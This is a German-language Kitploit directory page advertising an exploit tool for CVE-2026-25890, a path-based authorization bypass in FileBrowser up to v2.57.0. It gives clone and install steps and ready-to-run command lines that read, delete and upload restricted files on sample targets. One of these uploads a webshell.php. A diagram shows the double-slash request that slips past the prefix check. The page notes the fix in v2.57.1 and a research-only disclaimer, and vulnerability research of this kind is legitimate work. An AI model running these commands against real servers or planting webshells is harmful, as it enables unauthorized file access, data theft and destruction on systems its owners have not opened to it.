Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — Exploit für CVE-2026-25890, eine pfadbasierte Autorisierungsumgehung in FileBrowser <= v2.57.0, die es authentifizierten Benutzern mit niedrigen Rechten ermöglicht, eingeschränkte Dateien über mehrere führende Schrägstriche zu lesen, hochzuladen und zu löschen. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

Exploit für CVE-2026-25890, eine pfadbasierte Autorisierungsumgehung in FileBrowser <= v2.57.0, die es authentifizierten Benutzern mit niedrigen Rechten ermöglicht, eingeschränkte Dateien über mehrere führende Schrägstriche zu lesen, hochzuladen und zu löschen.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25890 - FileBrowser Access Control Bypass

Author GitHub license Python version CVE Exploit-DB Tested on

Nicht authentifizierte Benutzer können dies nicht ausnutzen – es sind gültige Anmeldedaten mit niedrigen Privilegien erforderlich, die für den Zielpfad eingeschränkt sind.

Pfadbasierte Autorisierungsumgehung in FileBrowser ≤ v2.57.0 unter Verwendung mehrerer führender Schrägstriche (//private statt /private), um strings.HasPrefix()-Prüfungen zu umgehen, während das Dateisystem weiterhin den kanonischen Pfad ausliefert.

Behoben in v2.57.1 (Commit 489af403... – r.SkipClean(true) entfernt).

📦 Funktionen

  • Lesen eingeschränkter Dateien
  • Hochladen von Dateien in eingeschränkte Verzeichnisse
  • Löschen eingeschränkter Dateien
  • Benutzerdefinierte Anzahl führender Schrägstriche für Bypass-Tests
  • Lokales Speichern geleakter Dateien
  • Ausführliche Inhaltsvorschau
  • Saubere CLI mit argparse

🛠️ Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# Keine Abhängigkeiten außer Standardbibliothek + requests
pip install requests

🚀 Verwendung

root@kitploit:~
python3 exploit.py --help

Grundlegende Beispiele

root@kitploit:~
# Eingeschränkte Datei lesen
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# Schädliche Datei in eingeschränkten Ordner hochladen
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# Eingeschränkte Datei löschen
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 PoC-Angriffsablauf

root@kitploit:~
sequenceDiagram
    participant Attacker
    participant FileBrowser ≤ v2.57.0
    participant Gorilla Mux Router
    participant Auth Middleware
    participant Filesystem Handler

    Attacker->>FileBrowser: GET /api/resources/private/secret.txt<br>(normale Anfrage)
    FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
    Gorilla Mux->>Auth Middleware: path = "/private/secret.txt"
    Auth Middleware->>Auth Middleware: strings.HasPrefix("/private/secret.txt", disallowed="/private") → true
    Auth Middleware->>Attacker: 403 Forbidden

    Note over Attacker,FileBrowser: Angreifer versucht Bypass

    Attacker->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → keine Normalisierung)
    Gorilla Mux->>Auth Middleware: path = "//private/secret.txt"
    Auth Middleware->>Auth Middleware: HasPrefix("//private/secret.txt", "/private") → false
    Auth Middleware->>Filesystem Handler: Erlaubt → fortfahren
    Filesystem Handler->>Filesystem: Normalisiert // → /private/secret.txt
    Filesystem->>Filesystem Handler: Gibt Dateiinhalt zurück
    Filesystem Handler->>Attacker: 200 OK + geheimer Inhalt

⚠️ Rechtlicher und ethischer Haftungsausschluss

Dieses Proof-of-Concept wird ausschließlich für Bildungs- und Sicherheitsforschungszwecke bereitgestellt.
Verwenden Sie diesen Code nicht gegen ein System ohne ausdrückliche schriftliche Genehmigung des Eigentümers.
Unbefugter Zugriff oder unbefugte Änderung von Systemen ist in den meisten Rechtsordnungen illegal (z. B. CFAA, Computer Misuse Act).

📜 Referenzen

  • GitHub Advisory GHSA-4mh3-h929-w968
  • Fix-Commit
  • Release v2.57.1

❤️ Danksagungen

Exploit-Autor: Mohammed Idrees Banyamer
Land: Jordanien
Instagram: @banyamer_security

Stern ⭐ das Repository, wenn es nützlich ist!


Zuletzt aktualisiert: Februar 2026

Tool herunterladen